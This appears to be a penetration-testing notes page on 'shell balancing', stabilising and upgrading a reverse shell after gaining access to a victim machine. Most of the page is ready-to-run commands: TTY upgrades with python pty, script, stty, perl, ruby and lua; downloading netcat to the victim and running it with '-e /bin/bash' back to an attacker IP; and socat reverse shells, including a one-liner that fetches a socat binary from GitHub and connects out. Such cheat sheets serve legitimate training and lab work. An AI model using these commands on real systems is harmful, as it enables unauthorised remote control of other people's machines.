Shell Balancing

after initial access into machine we need to stable our shell so there are various ways to do this we will be looking over them ..

Example of Bad shell

Upgrade reverse shell to fully usable TTY shell

rlwrap

  • During reciving connection form target machine we can use rlwrap

  • we can also mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the rlwrap command.

  • This is not installed by default so we need to install it using sudo apt rlwrap.

rlwrap nc -lvnp $port

Using env-call and script

  • This is a generic shell command that receive the default system shell. 

SHELL=/bin/bash script -q /dev/null

Using Script

  • script comes pre-installed

  • check the man page

  • -q is for quite , -c is for command 

/usr/bin/script -qc /bin/bash /dev/null

ctrl+z

stty raw -echo; fg; reset

Python

  • Python is great tool for balancing the shell. 

 # on victum machine
python -c 'import pty;pty.spawn("/bin/bash")' 
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

# on attacker machine
stty raw -echo    
fg                
# on victum machine
reset    
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

Perl

  • If python is not installed or perl avilable on box then we can use this .

perl -e 'exec "/bin/sh";'	#

Ruby

  • if ruby is installed on box.

exec "/bin/sh"        

ruby -e 'exec "/bin/sh"'

Lua

lua -e "os.execute('/bin/sh')"

Copy over NC and spawn a shell

  • Using wget and python's SimpleHttpServer NC was easily moved over to the target

  • here we copy nc to victum machine and then receive the shell.

# Attacker Machine

cp /usr/bin/nc . ; python -m SimpleHttpServer 9998               
nc -nlvp 9998

# Victum Machine

cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9998 -e /bin/bash

Socat

  • never sue nc while receiving connections ,use socat it will give you more generic shell like ssh.

# Attacker Machine

socat file:`tty`,raw,echo=0 TCP-L:1234
# Victum Machine

    
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234    

# if socat not preasent then we can use the binary 

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234

PreviousPost ExploitationNextGetting Comfortable with kali

Last updated